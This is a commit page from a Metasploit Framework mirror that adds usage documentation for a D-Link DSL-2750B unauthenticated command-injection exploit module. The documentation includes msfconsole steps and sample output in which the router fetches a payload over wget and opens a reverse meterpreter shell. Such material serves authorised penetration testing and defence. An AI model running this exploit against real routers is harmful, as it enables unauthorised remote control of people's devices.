infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Adding documentation, improving description

GSoC/Meterpreter_Web_Console
lucyoa 2018-05-13 15:04:40 -04:00
parent c3ad02121c
commit 382364a3ff
No known key found for this signature in database
GPG Key ID: 4451D394D086AF54
2 changed files with 62 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

61
documentation/modules/exploit/linux/http/dlink_dsl2750b_exec_noauth.md Normal file
View File

@ -0,0 +1,61 @@
This module dlink_dsl2750b_exec_noauth exploits unauthenticated command injection vulnerability through "cli" parameter.
Vulnerable firmwares are 1.01 up to 1.03.
## Vulnerable Application
1. Start msfconsole
2. Do : `use exploit/linux/http/dlink_dsl2750b_exec_noauth`
3. Do : `set RHOST [RouterIP]`
4. Do : `set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp`
5. Do : `run`
6. If router is vulnerable, payload should be dropped via wget method and executed giving us meterpreter session
## Example
```
msf5 > use exploit/linux/http/dlink_dsl2750b_exec_noauth
msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp
PAYLOAD => linux/mipsbe/meterpreter/reverse_tcp
msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > set LHOST eth0
LHOST => eth0
msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > set LPORT 5555
LPORT => 5555
msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > run
[*] Started reverse TCP handler on 192.168.1.6:5555
[*] 192.168.1.1:80 Checking target version...
[*] Using URL: http://0.0.0.0:8080/V9GiueD0WW
[*] Local IP: http://192.168.1.6:8080/V9GiueD0WW
[*] Client 192.168.1.1 (Wget) requested /V9GiueD0WW
[*] Sending payload to 192.168.1.1 (Wget)
[*] Sending stage (1104216 bytes) to 192.168.1.1
[*] Meterpreter session 18 opened (192.168.1.6:5555 -> 192.168.1.1:37259) at 2018-05-13 14:58:08 -0400
[*] Command Stager progress - 100.00% done (114/114 bytes)
[*] Server stopped.
meterpreter > ls -la
Listing: /
==========
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40755/rwxr-xr-x 2554 dir 2013-03-11 07:27:09 -0400 bin
40755/rwxr-xr-x 3 dir 2013-03-11 07:27:54 -0400 data
40755/rwxr-xr-x 2482 dir 2013-03-11 07:27:56 -0400 dev
40755/rwxr-xr-x 779 dir 2013-03-11 07:27:55 -0400 etc
40755/rwxr-xr-x 690 dir 2013-03-11 07:27:55 -0400 lib
100755/rwxr-xr-x 287124 fil 2013-03-11 07:27:55 -0400 linuxrc
40755/rwxr-xr-x 0 dir 1969-12-31 19:00:01 -0500 mnt
40755/rwxr-xr-x 56 dir 2013-03-11 07:13:15 -0400 opt
40555/r-xr-xr-x 0 dir 1969-12-31 19:00:00 -0500 proc
40755/rwxr-xr-x 270 dir 2013-03-11 07:25:43 -0400 sbin
40755/rwxr-xr-x 0 dir 1969-12-31 19:00:00 -0500 sys
40755/rwxr-xr-x 0 dir 2016-10-07 17:20:39 -0400 tmp
40755/rwxr-xr-x 38 dir 2013-03-11 07:23:32 -0400 usr
40755/rwxr-xr-x 0 dir 2016-10-07 17:16:34 -0400 var
40755/rwxr-xr-x 2801 dir 2013-03-11 07:26:34 -0400 webs
```

2
modules/exploits/linux/http/dlink_dsl2750b_exec_noauth.rb
View File

@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
'Description' => %q{
This module exploits a remote command injection vulnerability in D-Link DSL-2750B devices.
Vulnerability can be exploited through "cli" parameter that is directly used to invoke
"ayecli" binary.
"ayecli" binary. Vulnerable firmwares are from 1.01 up to 1.03.
},
'Author' =>
[